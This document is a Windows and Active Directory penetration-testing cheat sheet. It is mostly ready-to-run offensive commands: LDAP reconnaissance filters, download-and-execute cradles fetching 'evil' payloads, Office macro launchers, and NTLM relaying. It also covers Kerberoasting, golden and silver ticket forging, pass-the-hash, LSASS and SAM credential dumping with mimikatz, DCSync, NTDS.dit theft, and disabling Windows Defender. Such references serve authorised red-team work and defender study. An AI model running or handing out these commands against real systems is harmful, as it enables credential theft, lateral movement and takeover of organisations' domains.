[[_TOC_]]

AD/LDAP
=======
#### Recon with ADModule/LDAP filters
##### Get domain users

    Get-ADUser -LDAPFilter "<filter>"

##### User LDAP filters
Get all domain users

    (&(samAccountType=805306368))

Get user by name

     (&(samAccountType=805306368)(|(samAccountName=<user>)))

Get user by sid

    (&(samAccountType=805306368)(|(objectsid=S-1-5-21-2804199971-1716470690-2642495997-1113)))

Get users with non-null SPNs

    (&(samAccountType=805306368)(servicePrincipalName=*))

Get privileged users

    (&(samAccountType=805306368)(admincount=1))

Get users trusted to authenticate with other principals

    (&(samAccountType=805306368)(msds-allowedtodelegateto=*))

Get users who can be delegated

    (&(samAccountType=805306368)(!(userAccountControl:1.2.840.113556.1.4.803:=1048574)))

Get users who are sensitive, but cannot are trusted for delegation

    (&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=1048574))

Get users with Kerberos Preauthentication disabled

    (&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))

Get users belonging to a specific group (wildcards)

    (&(objectCategory=group)(|(samAccountName=<name>)))
    (&(|(distinguishedname=CN=Domain Admins,CN=Users,DC=LAB,DC=LOCAL)))
    (&(|(distinguishedname=CN=Enterprise Admins,CN=Users,DC=test,DC=LOCAL)))
    (&(|(distinguishedname=CN=Administrator,CN=Users,DC=test,DC=LOCAL)))

##### Get domain groups

    Get-ADGroup -LDAPFilter

##### Group LDAP filters
Get all groups

     (&(objectCategory=group))

Get groups by name

     (&(objectCategory=group)(|(|(samAccountName=*admin*)(name=*admin*))))

Get groups by sid (Admin SID)

    (&(objectCategory=group)(|(objectsid=S-1-5-32-544)))

Get groups and specify user/group member to query for group membership

    (&(|(|(samAccountName=*)(name=*)(displayname=*))))
    (objectClass=*)

Get privileged groups or groups with privileged users

    (&(objectCategory=group)(admincount=1))

Get groups by scope

    (&(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=4)) # DomainLocal
    (&(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2)) # Global
    (&(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=8)) # Universal

Get groups by property

     (&(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2147483648)) # Security
     (&(objectCategory=group)(!(groupType:1.2.840.113556.1.4.803:=2147483648))) # Distribution
     (&(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=1)) # CreatedBySystem
     (&(objectCategory=group)(!(groupType:1.2.840.113556.1.4.803:=1))) # NotCreatedBySystem




##### Get domain computers

    Get-ADComputer -LDAPFilter "<filter>"

##### Computer LDAP filters
Get all computers

    (&(samAccountType=805306369))

Get computer by name

    (&(samAccountType=805306369)(|(name=lab-ws01)))

Get computer by sid

    (&(samAccountType=805306369)(|(objectsid=S-1-5-21-2804199971-1716470690-2642495997-1114)))

Get computer objects with unconstrained delegation

    (&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))

Get computer objects trusted to authenticate with other principals

    (&(samAccountType=805306369)(msds-allowedtodelegateto=*))

Get printers

    (&(samAccountType=805306369)(objectCategory=printQueue))

Get computer objects with a specific SPN or wildcard

    (&(samAccountType=805306369)(servicePrincipalName=*))

Get computer objects with a specific operating system or wildcard

    (&(samAccountType=805306369)(operatingsystem=*))

Get computer objects with a specific service pack or wildcard

    (&(samAccountType=805306369)(operatingsystemservicepack=*))

Get computer objects in a specific AD site or wildcard

    (&(samAccountType=805306369)(serverreferencebl=*))

##### Get domain objects

    Get-ADObject -LDAPFilter "<filter>"

##### Object LDAP filters

Get objects by name

    (&(|(|(samAccountName=<name>)(name=<name>)(displayname=<name>))))

Get objects by sid

    (&(|(objectsid=S-1-5-21-2804199971-1716470690-2642495997-1114)))

Get GPOs by name

    (&(objectCategory=groupPolicyContainer)(|(displayname=*)))

Get GPOs by GUID

    (&(objectCategory=groupPolicyContainer)(|(name={31B2F340-016D-11D2-945F-00C04FB984F9})))
    (&(objectCategory=groupPolicyContainer)(|(objectguid=\79\10\7A\B7\14\A9\7B\4B\99\9C\63\DB\87\5E\D2\7F)))

##### Get domain object ACLs

    Set-Location AD:
    (Get-ACL 'OU=test,DC=test,DC=local').Access

    (&(|(|(samAccountName=mssql.user)(name=mssql.user)(dnshostname=mssql.user))))

##### Get domain OUs

    Get-ADOrganizationalUnit -LDAPFilte "<filter>"

Get OUs by name

    (&(objectCategory=organizationalUnit)(|(name=<name>)))

Get OUs with gplink GUID

    (&(objectCategory=organizationalUnit)(gplink=<GPO GUID>))

##### Get domain subnets

    Get-ADReplicationSubnet -Filter *








Attack
======
#### Download & execution cradles
##### Powershell

    powershell -c IEX ((New-Object System.Net.WebClient).DownloadString("http://127.0.0.1/evil.ps1"))

##### WMIC

    wmic os get /format:"http://127.0.0.1/evil.xsl"

##### regsvr32

    regsvr32 /u /n /s /i:http://127.0.0.1/evil.sct scrobj.dll

##### MSHTA

    mshta vbscript:Execute("GetObject(""script:http://127.0.0.1evil.sct"")")

##### CScript

    cscript //E:jscript \\webdav\evil.txt

##### InstallUtil

    InstallUtil.exe /logfile= /LogToConsole=false /U evil.dll

##### MSXSL

    msxsl.exe bad.xml evil.xsl

##### MSBuild

    msbuild.exe evil.xml

#### Microsoft Office Macro cradles
##### WScript

    Dim obj
    Set obj = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
    obj.Run "calc.exe", 0

##### ShellBrowserWindow (explorer.exe)

    Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
    obj.Document.Application.ShellExecute "calc.exe", Null, "C:\Windows\System32", Null, 0

##### ShellBrowserWindow (explorer.exe) + rundll32 and delay

    Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
    obj.Document.Application.ShellExecute "rundll32", payload & ",start", "", Null, 0
    Dim dt: dt = DateAdd("s", 3, Now()): Do Until (Now() > dt): Loop
    objFSO.DeleteFile payload

##### Outlook

    Set obj = GetObject("new:0006F03A-0000-0000-C000-000000000046")
    obj.CreateObject("WScript.Shell").Run ("calc.exe")

##### WMI

    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set ObjStartUp = objWMIService.Get("Win32_ProcessStartup")
    Set objProc = objWMIService.Get("Win32_Process")
    Set procStartConfig = objStartUp.SpawnInstance_
    procStartConfig.ShowWindow = 0
    objProc.Create "calc.exe", Null, procStartConfig, intProcessID

##### InternetExplorer.Application

    Set ie = CreateObject("InternetExplorer.Application")
    ie.Navigate "http://127.0.0.1/evil.html"
    State = 0
    Do Until State = 4: DoEvents: State = ie.readyState: Loop
    Dim payload: payload = ie.Document.Body.getElementsByTagName("pre").Item(0).innerHTML

##### Schedule.Service

    Set service = CreateObject("Schedule.Service")
    Call service.Connect
    Dim td: Set td = service.NewTask(0)
    td.RegistrationInfo.Author = "Microsoft Corporation"
    td.settings.StartWhenAvailable = True
    td.settings.Hidden = False
    Dim triggers: Set triggers = td.triggers
    Dim trigger: Set trigger = triggers.Create(1)
    Dim startTime: ts = DateAdd("s", 30, Now)
    startTime = Year(ts) & "-" & Right(Month(ts), 2) & "-" & Right(Day(ts), 2) _
    & "T" & Right(Hour(ts), 2) & ":" & Right(Minute(ts), 2) & ":" & Right(Second(ts), 2)
    trigger.StartBoundary = startTime
    trigger.ID = "TimeTriggerId"
    Dim Action: Set Action = td.Actions.Create(0)
    Action.Path = "C:\Windows\system32\calc.exe"
    Call service.GetFolder("\").RegisterTaskDefinition("UpdateTask", td, 6, , , 3)

#### Group Policy Objects
##### Enumerate users that can create GPOs

    Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=domain,DC=com" -ResolveGUIDs | Where-Object { $_.ObjectAceType -eq "Group-Policy-Container" }
    Convert-SidToName <sid>

##### Enumerate users that can manage GpLinks for OU

    Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object { $_.ObjectAceType -eq "GP-Link" }

##### Enumerate users that can modify GPO

    Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -match "WriteProperty|WriteDacl|WriteOwner" -and $_.SecurityIdentifier -match "<DOMAIN_SID>-[\d]{4,10}" }

##### Find credentials in logon/logoff scripts and registry settings

    Get-ChildItem -Recurse \\dc.domain.com\sysvol\domain.com\ -filter *.vbs | Select-String -Pattern "assw"

##### Find local administrator credentials in GP Preferences

    Get-ChildItem -Recurse \\dc.domain.com\sysvol\domain.com\policies -filter *.xml | Select-String -Pattern "cpassw"

##### Find where GPO is applied

    Get-DomainOU -GPLink "{A5AB8FEB-ADC3-47A8-928B-1AB4D09B9D9B}" -Properties DistinguishedName

#### ACEs
##### Audit ACL to find GenericAll

    Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -eq "GenericAll" }

Set logon script for found user

    Set-DomainObject <username> -Set ${'scriptpath'='\\127.0.0.1\c$\evil.vbs'} -Verbose

#### NTLM Relaying
##### Generate relay list (with SMB Signing off)

    crackmapexec smb <CIDR> --gen-relay-list targets.txt

##### Run Responder
Disable HTTP and SMB servers in Responder.conf

    python Responder -I <iface> -r -d -w

##### Run ntlmrelayx

    ntlmrelayx.py -tf targets.txt -smb2support
    ntlmrelayx.py -tf targets.txt -c <PowerShell stager/dropper> -smb2support

or

##### Run MultiRelay

    python MultiRelay.py -t <target host> -c <PowerShell stager/dropper> -u <user to target>
    python MultiRelay.py -t <target host> -c <PowerShell stager/dropper> -u ALL

#### Kerberos
Unconstrained delegation: the server can request access to any service on any computer
Constrained delegation: only access to specific services on specific computers is allowed

Constrained delegation - Service-for-user (S4U) extensions:
S4USelf: a service can request forwardable TGS to itself on behalf of user
S4U2Proxy: service account is allowed to use ticket to request a service ticket to any SPN set in msds-allowedtodelegateto and TRUSTED_TO_AUTH_FOR_DELEGATION on userAccountControl attribute
##### Find SPNs for kerberoasting

    Get-ADObject | Where-Object {$_.servicePrincipalName -ne $null -and $_.DistinguishedName -like "*CN=Users*" -and $_.cn -ne "krbtgt"}

##### Find computers with unconstrained delegation

    Get-DomainCOmputer -Unconstrained

##### Find computers with constrained delegation

    Get-DomainUser -TrustedToAuth
    Get-DomainComputer -TrustedToAuth

##### Use Rubeus to request TGT, TGS and perform S4U2Proxy with another SPN
Create ticket for LDAP service impersonating domain admin, allowing DCSync

    Rubeus.exe s4u /user:FS01$ /rc4:... /domain:domain.com /impersonateuser:administrator /msdsspn:"TERMSRV/DC01.domain.com" /altservice:ldap /ptt

##### Bruteforce with kerbrute.py

    python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

##### Bruteforce with Rubeus
With a list of users

    .\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

Check passwords for all users in current domain

    .\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

##### ASREPRoast with impacket
Check ASREPRoast for all domain users (credentials required)

    python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Check ASREPRoast for a list of users (no credentials required)

    python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

##### ASREPRoast with Rubeus
Check ASREPRoast for all users in current domain

    .\Rubeus.exe asreproast  /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>

Crack hashes with hashcat

    hashcat -m 18200 -a 0 -w3 <AS_REP_responses_file> <passwords_file>

##### Kerberoasting with impacket

    python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

##### Kerberoasting with Rubeus

    .\Rubeus.exe kerberoast /outfile:<output_TGSs_file>

##### Kerberoasting with Powershell

    iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
    Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>

##### Cracking kerberosated users/hashes

    hashcat -m 13100 -w3 <TGSs_file> <passwords_file>

##### Pass The Hash/Pass The Key

Request the TGT with hash

    python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)

    python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>

Request the TGT with password
If not provided, password is asked

    python getTGT.py <domain_name>/<user_name>:[password]

Set the TGT for impacket use

    export KRB5CCNAME=<TGT_ccache_file>

Execute remote commands with any of the following by using the TGT

    python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

##### PTK with Rubeus and PsExec

Ask and inject the ticket

    .\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

Execute a cmd in the remote machine

    .\PsExec.exe -accepteula \\<remote_hostname> cmd

##### Pass The Ticket
Harvest tickets from Linux
Check type and location of tickets. If none return, default is FILE:/tmp/krb5cc\_<UID>
In case of file tickets, you can copy-paste (if you have permissions) for use them.

    grep default_ccache_name /etc/krb5.conf


In case of being KEYRING tickets, you can use tickey to get them.
To dump current user tickets, if root, try to dump them all by injecting in other user processes to inject, copy tickey in a reachable folder by all users.

    cp tickey /tmp/tickey
    /tmp/tickey -i

Harvest tickets from Windows

    mimikatz # sekurlsa::tickets /export

    .\Rubeus dump
    [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))

Convert tickets between Windows/Linux

    python ticket_converter.py ticket.kirbi ticket.ccache
    python ticket_converter.py ticket.ccache ticket.kirbi

Using tickets in Linux
Set the ticket for impacket use

    export KRB5CCNAME=<TGT_ccache_file_path>

Execute remote commands with any of the following by using the TGT

    python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using tickets in Windows
Inject ticket with Mimikatz

    mimikatz # kerberos::ptt <ticket_kirbi_file>

Inject ticket with Rubeus

    .\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Execute a cmd in the remote machine with PsExec:

    .\PsExec.exe -accepteula \\<remote_hostname> cmd

##### Silver ticket with impacket

To generate the TGS with NTLM

    python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>

To generate the TGS with AES key

    python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>

Set the ticket for impacket use

    export KRB5CCNAME=<TGS_ccache_file>

Execute remote commands with any of the following by using the TGT

    python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

##### Silver ticket with Mimikatz/Rubeus
To generate the TGS with NTLM

    mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

To generate the TGS with AES 128 key

    mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)

    mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

Inject TGS with Mimikatz

    mimikatz # kerberos::ptt <ticket_kirbi_file>

Inject TGS with Rubeus

    .\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Execute command in the remote machine with PsExec

    .\PsExec.exe -accepteula \\<remote_hostname> cmd

##### Golden ticket with impacket
To generate the TGT with NTLM

    python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>

To generate the TGT with AES key

    python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>

Set the ticket for impacket use

    export KRB5CCNAME=<TGS_ccache_file>

Execute remote commands with any of the following by using the TGT

    python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

##### Golden ticket with Mimikatz/Rubeus
To generate the TGT with NTLM

    mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>

To generate the TGT with AES 128 key

    mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>

To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)

    mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>

Inject TGT with Mimikatz

    mimikatz # kerberos::ptt <ticket_kirbi_file>

Inject TGT with Rubeus

    .\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Execute command in the remote machine with PsExec

    .\PsExec.exe -accepteula \\<remote_hostname> cmd

##### Dump TGT and use in impacket
Dump TGT

    rubeus.exe tgtdeleg

Base64 decode

    cat tgt.b64 | tr -d " \t\n\r" | base64 -d > tgt.kirbi

Convert

    python ticket_convert.py tgt.kirbi /tmp/tgt.ccache

Use with impacket:

    export KRB5CCNAME=/tmp/tgt.ccache
    wmiexec -no-pass -k user@host

#### Disable Windows Defender with symlink
Restart to take effect. Unlink to revert

    mklink "C:\ProgramData\Microsoft\Windows Defender:xxx" "\??\NUL"

#### LSA Secrets
##### Requires NT Authority\SYSTEM

    reg save hklm\sam C:\Windows\Temp\sam
    reg save hklm\security C:\Windows\Temp\security
    reg save hklm\system C:\Windows\Temp\system

##### SAM and SYSTEM backups

    C:\Windows\Repair\SAM
    C:\Windows\Repair\SYSTEM

##### impacket-secretsdump

    impacket-secretsdump -sam sam -security security -system system LOCAL

#### LSASS dump
##### ProcDump

    procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp 2>&1

Can also be done on more recent Windows versions via Task Manager > Processes > lsass.exe > (right click) > Memory Dump

#### Mimikatz
##### Read lsass.exe dump file offline

    mimikatz.exe "log dump_file.log" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

##### Dump passwords and hashes on live system

    mimikatz "log hashes.log" "privilege::debug" "sekurlsa::logonPasswords full" exit

#### CME + mitm6 + ntlmrelayx
##### With relay hosts MITM

Generate relay list

    cme smb $hosts --gen-relay-list relay.txt

Start mitm6

    mitm6 -i eth0 -d $domain

Start ntlmrelayx

    ntlmrelayx.py -6 -wh $RHOST -of loot.txt -tf relay.txt

PTH with Administrator hash

    cme smb $hosts -u Administrator -H $hash -d LOCALHOST --lsa

##### With WPAD MITM
Start mtm6

    mitm6 -i eth0 -d <domain>

Start ntlmrelayx

    ntlmrelayx.py -t ldaps://<DomainController> -wh attacker-wpad --delegate-access

Set KRB5CCNAME envvar to the TGS cache file

    export KRB5CCNAME=<TGS_ccache_file>

Use secretsdump on remote server

    secretsdump.py -k -no-pass <remote_server>

#### LDAP
##### LDAP passwords
Dump target user hash

    ldapsearch -x -h <ldap_server> -D "cn=Directory Manager" -w <password> -b 'uid=<target_username>,cn=users,cn=accounts,dc=<DOMAIN>,dc=COM' uid userpassword krbprincipalkey sambalmpassword sambantpassword

Base64 decode userpassword:: and krbprincipalkey::

    echo <base64> | base64 -d > hash.txt

Crack with hashcat

    hashcat -a0 -m111 hash.txt dict.txt

##### Dump LDAP domain

    ldapdomaindump <DC-ip> -u '<domain>\<username>' -p '<password>' --no-json --no-grep

#### DCSync attack
##### Find users with "Replicating Directory Changes" permissions for DCSync attack

indows built-in tool:

    dsacls "DC=<domain>,DC=LOCAL"

    [...]
    Allow <domain>\<user>          Replicating Directory Changes
    Allow <domain>\<user>          Replicating Directory Changes All
    [...]

Powershell (requires resolving ObjectType GUID):

    Import-Module ActiveDirectory
    Get-ACL "AD:\DC=<domain>,DC=LOCAL" | Select-Object -ExpandProperty Access

DS-Replication-Get-Changes:

    CN: DS-Replication-Get-Changes
    GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2

Replicating Directory Changes All:

    CN: DS-Replication-Get-Changes-All
    GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2

Replicating Directory Changes in Filtered Set:

    CN: DS-Replication-Get-Changes-In-Filtered-Set
    GUID: 89e95b76-444d-4c62-991a-0facbeda640c

##### Executing DCSync attack, requires user credentials with "Replicating Directory Changes" permissions

    python3 /usr/share/doc/python3-impacket/examples/secretsdump.py <domain>/<user>:<password>@<DC-ip> -dc-ip <DC-ip>

#### Evil-WinRM PTH
PTH format must be the NTLM hash (after ":")

    evil-winrm -i <ip> -u <username> -H <nt_hash>

#### Steal NTDS.dit and SYSTEM files
Longer version

    vssadmin create shadow /for=C:
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit c:\ntds.dit
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\SYSTEM c:\SYSTEM

Shorter version

    ntdsutil "ac in ntds" i "cr fu c:\temp" q q

Enumeration
===========
#### User accounts
##### Local username enumeration

    net user
    net user <username>

##### Domain username enumeration

    net user /domain
    net user <username> /domain
##### Local group enumeration

    net localgroup
    net localgroup <group>

##### Domain group enumeration

    net group /domain
    net group <group> /domain

#### Network
##### View network shares

    net share

#### RDP history

    HKCU\Software\Microsoft\Terminal Server Client\

#### Recent files

    %APPDATA%\Microsoft\Windows\Recent

#### Saved Putty sessions

    Software\<name>\PuTTY\Sessions\

#### Powershell console history

    %APPDATA%\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

#### Sensitive files and credentials
##### Find files by keywords

    dir /s *pass* == *cred* == *vnc* == *.config*

##### Find plaintext credentials

    findstr /rpsi /c:"net use.*/user:" C:\*

##### Find strings in file types

    findstr /si <keyword> *.xml *.ini *.txt

##### Find password strings in regkeys
Local machine/Local user

    reg query HKLM /f password /t REG_SZ /s
    reg query HKCU /f password /t REG_SZ /s

#### Services
##### List all service permissions with accesschk.exe

    accesschk.exe -accepteula -uwcqv "Authenticated Users" *

##### List service permissions with accesschk.exe

    accesschk.exe -accepteula -ucqv <service>

##### Query service 

    sc qc <service>

##### Modify service binary path
Note the <space> after "binpath="

    sc config <service> binpath= "X:\path\to\evil.exe"

##### Modify privileges on service
Note the <space> after "obj="

    sc config <serivce> obj= ".\LocalSystem" password= ""

##### Modify dependencies on service
Note the <space> after "depend="

    sc config <service> depend= ""

#### Permissions
##### Permissions check

    cacls <file>
    icacls <file>

##### Set permissions

    cacls <file> /grant <username>:(<perm>,<perm>)
    icacls <file> /grant <username>:(<perm>,<perm>)

e.g.

    icacls test.txt /grant:John:(d,wdac)

##### Find writable permissions on %windir%
Note that you might not be able to list directory

    %windir%\system32\microsoft\crypto\rsa\machinekeys
    %windir%\system32\tasks_migrated\microsoft\windows\pla\system
    %windir%\syswow64\tasks\microsoft\windows\pla\system
    %windir%\debug\wia
    %windir%\system32\tasks
    %windir%\syswow64\tasks
    %windir%\tasks
    %windir%\registration\crmlog
    %windir%\system32\com\dmp
    %windir%\system32\fxstmp
    %windir%\system32\spool\drivers\color
    %windir%\system32\spool\printers
    %windir%\system32\spool\servers
    %windir%\syswow64\com\dmp
    %windir%\syswow64\com\fxstmp
    %windir%\temp
    %windir%\tracing

Shell
=====
#### Get WiFi passwords

    netsh wlan show profiles
    netsh wlan show profile=<WiFi network name> key=clear

PowerShell
==========
#### Windows Defender
##### Add Windows Defender exclusion path
Requires administrative privileges

    powershell -exec bypass "Add-MpPreference -ExclusionPath 'C:\path\to\evil'"

##### Disable Windows Defender
Requires administrative privileges

    powershell -exec bypass "Set-MpPreference -DisableRealtimeMonitoring $true

#### Stealthy powershell filesnames
Regex

    __PSScriptPolicyTest_[a-b0-9]{9}\.[a-z0-9]{3}\.ps1

e.g.

    C:\WINDOWS\TEMP\__PSScriptPolicyTest_u3lrbaun.eqb.ps1

#### Read history and grep

    cat (Get-PSReadlineOption).HistorySavePath | sls password

#### Powerhell RunAs

    $password = ConvertTo-SecureString "<password>" -AsPlainText -Force
    $creds = New-Object System.Management.Automation.PSCredential ("<domain>\<username>", $password)
    $hostname = "<hostname>"
    [System.Diagnostics.Process]::Start("C:\Windows\System32\cmd.exe", "", $creds.Username, $creds.Password, $hostname)

or

    $password = ConvertTo-SecureString "<password>" -AsPlainText -Force
    $creds = New-Object System.Management.Automation.PSCredential ("<domain>\<username>", $password)
    Start-Process powershell.exe -Credential $creds -NoNewWindow -ArgumentList "-nop -w 1 -sta -c IEX (New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/evil')"

#### Powershell Remoting

    $password = ConvertTo-SecureString "<password>" -AsPlainText -Force;
    $creds = New-Object System.Management.Automation.PSCredential("<domain>\<username>", $password)
    Invoke-Command -ComputerName <hostname> -Credential $creds -ScriptBlock { IEX (New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/evil') };

    Enter-PSSession <hostname> -Credential <domain>\<user>
    Enter-PSSession <hostname> -Authentication Kerberos

#### Base64-encode file via Powershell

    [Convert]::ToBase64String([IO.File]::ReadAllBytes(".\file"))

#### Base64-decode file via Powershell

    [IO.File]::WriteAllBytes($FileName, [Convert]::FromBase64String("<base64string>"))

#### Download files via Powershell

    powershell.exe -nop -w 1 -sta -c (New-Object System.Net.WebClient).DownloadFile('http://<ip>/file.exe','c:\dest\folder\file.exe')
    powershell.exe -nop -w 1 -sta -c (Start-BitsTransfer -Source "http://<ip>/file.exe -Destination C:\dest\folder\file.exe")
    powershell.exe wget "http://<ip>/file.exe" -outfile "c:\dest\folder\file.exe"

#### Upload file via Powershell to WebDav (e.g. wsgidav)
Over HTTP

    (New-Object System.Net.WebClient).UploadFile("http://127.0.0.1/test.txt", "PUT", "C:\test.txt")

Over HTTPS with selfsigned certificate

    [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};(New-Object System.Net.WebClient).UploadFile("https://127.0.0.1/test.txt", "PUT", "C:\test.txt")

Another selfsigned certificate bypass for newer Powershell versions

    add-type @"
    using System.Net;
    using System.Security.Cryptography.X509Certificates;
    public class TrustAllCertsPolicy : ICertificatePolicy {
        public bool CheckValidationResult(
            ServicePoint srvPoint, X509Certificate certificate,
            WebRequest request, int certificateProblem) {
            return true;
        }
    }
    "@
    [System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy

#### Assembly reflection from DLL on disk

    $FileBytes = [System.IO.File]::ReadAllBytes("C:\evil.dll")
    [Reflection.Assembly]::Load($FileBytes)
    [ClassName]::MethodName()

#### Lateral movement with Invoke-TheHash
From [https://github.com/Kevin-Robertson/Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash)

Invoke-WMIExec

    powershell.exe -nop -w 1 -sta -c (New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/Invoke-WMIExec.ps1')
    Invoke-WMIExec -Target <ip_address> -Domain <domain_or_workgroup> -Username <username> -Hash <ntlm_hash> -Command "<command>" -Verbose

Invoke-SMBExec

    powershell.exe -nop -w 1 -sta -c (New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/Invoke-SMBExec.ps1')
    Invoke-SMBExec -Target <ip_address> -Domain <domain_or_workgroup> -Username <username> -Hash <ntlm_hash> -Command "<command>" -Verbose

#### Windows Management Instrumentation
##### Query the root namespace for classes

    Get-WmiObject -Namespace "root" -Class "__Namespace"
    Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name

##### Query classes in namespace

    Get-WmiObject -Namespace "root\cimv2" -Class "*" -List

##### Find a class in the default cimv2 namespace by keyword

    Get-WmiObject -Namespace "root\cimv2" -Class "*service*" -List
    Get-WmiObject -Namespace "root\cimv2" -Class "*bios*" -List

##### Query dynamic classes which can be invoked

    Get-CimClass -QualifierName "dynamic"

##### Query a specific class

    Get-WmiObject -Class Win32_BIOS
    Get-CimInstance -ClassName Win32_BIOS

##### Get all methods named "Create" in the "root\cimv2" namespace

     Get-WmiObject -Namespace "root\cimv2" -List | ForEach-Object { $_ | Select -ExpandProperty Methods | Where Name -eq "Create" | Select Origin }

##### Get running processes

    Get-WmiObject -Class Win32_Process -Filter "Name = 'explorer.exe'"

    Get-WmiObject -Query "select * from Win32_Process where Name = 'explorer.exe'" | Select-Object *
    Get-CimInstance -Query "select * from Win32_Process where Name = 'explorer.exe'" | Select-Object *

    Get-WmiObject -Query "select * from Win32_Process where Name = 'explorer.exe'" | Select-Object Name,Path
    Get-CimInstance -Query "select * from Win32_Process where Name = 'explorer.exe'" | Select-Object Name,Path

##### Get running services

    Get-WmiObject -Query "select Name from Win32_Service where State = 'Running'" | Select-Object *
    Get-CimInstance -Query "select Name from Win32_Service where State = 'Running'" | Select-Object *

    Get-WmiObject -Query "select Name from Win32_Service where State = 'Running'" | Select-Object Name, PathName
    Get-CimInstance -Query "select Name from Win32_Service where State = 'Running'" | Select-Object Name, PathName

##### Get logged on users

    Get-WmiObject -Query "select * from Win32_LoggedOnUser"

##### Get log files on disk

    Get-WmiObject -Query "select * from Win32_NTEventlogFile"

##### Remove process

    Get-WmiObject -Class Win32_Process -Filter "Name = 'calculator.exe'" | Remove-WmiObject
    Get-WmiObject -Query "select * from Win32_Process where Name = 'calculator.exe'" | Remove-WmiObject

